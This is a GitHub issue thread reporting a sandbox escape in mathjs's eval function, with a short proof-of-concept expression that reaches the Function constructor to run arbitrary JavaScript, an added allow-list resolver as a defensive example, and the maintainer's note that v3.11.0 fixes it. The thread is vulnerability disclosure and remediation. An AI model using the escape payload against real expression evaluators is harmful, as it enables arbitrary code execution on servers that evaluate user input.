
Security issues in eval #822

Closed
xfix opened this Issue Apr 2, 2017 · 3 comments

@xfix

xfix commented Apr 2, 2017

I was going to report this privately, but I figured that somebody else already leaked issues (#821), so whatever. It's not that this may make things worse.

I read an article on Hacker News about discovering a bug in a library, and I was like, surely there are more issues when you allow direct access to JavaScript. I do admit, finding such issues was a fun game, but I found this.

require('mathjs').eval(String.raw`
    {}.constructor.assign(cos.constructor, {binding: cos.bind})
    {}.constructor.assign(cos.constructor, {bind: null})
    cos.constructor.binding()("console.log(/HACKED/)")()
`)

Blacklists are practically guaranteed to have more issues like that. Don't allow direct access to JavaScript objects like that, especially not for function calls (you may want to have a whitelist of functions?).
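
The allow-list approach recommended above, as an added example that is not part of the issue or of mathjs itself: a resolver that a hypothetical expression evaluator calls for every identifier, property access and function call. Each of the three steps in the proof of concept is refused at the lookup stage, because functions expose no properties and the prototype chain is never consulted, so nothing has to be blacklisted by name.

```javascript
// Added example, not code from mathjs: an allow-list resolver that a
// hypothetical expression evaluator calls for every identifier, property
// access and function call. Anything not explicitly allowed is unreachable.

// Functions an expression may call, keyed by their expression-language name.
const ALLOWED_FUNCTIONS = new Map([
  ['cos', Math.cos],
  ['sin', Math.sin],
  ['sqrt', Math.sqrt],
]);

// Identifiers resolve to an allowed function or a caller-supplied scope value;
// hasOwnProperty keeps prototype properties of the scope object out of reach.
function resolveIdentifier(name, scope) {
  if (ALLOWED_FUNCTIONS.has(name)) return ALLOWED_FUNCTIONS.get(name);
  if (Object.prototype.hasOwnProperty.call(scope, name)) return scope[name];
  throw new Error(`Undefined symbol ${name}`);
}

// Property access is limited to own, enumerable data properties of plain
// objects. Functions have no accessible properties at all and the prototype
// chain is never consulted, so `constructor`, `bind` and `__proto__` are
// rejected without being listed anywhere.
function getProperty(target, name) {
  if (target === null || typeof target !== 'object') {
    throw new Error(`Cannot access property ${name} of a ${typeof target}`);
  }
  const proto = Object.getPrototypeOf(target);
  if (proto !== Object.prototype && proto !== null) {
    throw new Error('Property access is only allowed on plain objects');
  }
  const desc = Object.getOwnPropertyDescriptor(target, name);
  if (!desc || !desc.enumerable || !('value' in desc)) {
    throw new Error(`Unknown property ${name}`);
  }
  return desc.value;
}

// Only a function taken from the allow list may be invoked; a function that
// reached the expression by any other route (e.g. via the scope) cannot.
function callFunction(fn, args) {
  for (const allowed of ALLOWED_FUNCTIONS.values()) {
    if (fn === allowed) return fn(...args);
  }
  throw new Error('Only allow-listed functions may be called');
}
```

With these three hooks the first line of the proof of concept already fails at `{}.constructor`, and `cos.constructor` / `cos.bind` fail because the target is a function.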

@josdejong


Owner

josdejong commented Apr 2, 2017

Thanks a lot @xfix, keep them coming! Your issue should be solved in the just released v3.11.0.

Thanks for thinking about reporting the issue in private, please do so the next time, that's always a good idea :)

@xfix


xfix commented Apr 2, 2017

@josdejong Okay, sent you an e-mail.

@josdejong


Owner

josdejong commented Apr 2, 2017

Thanks!
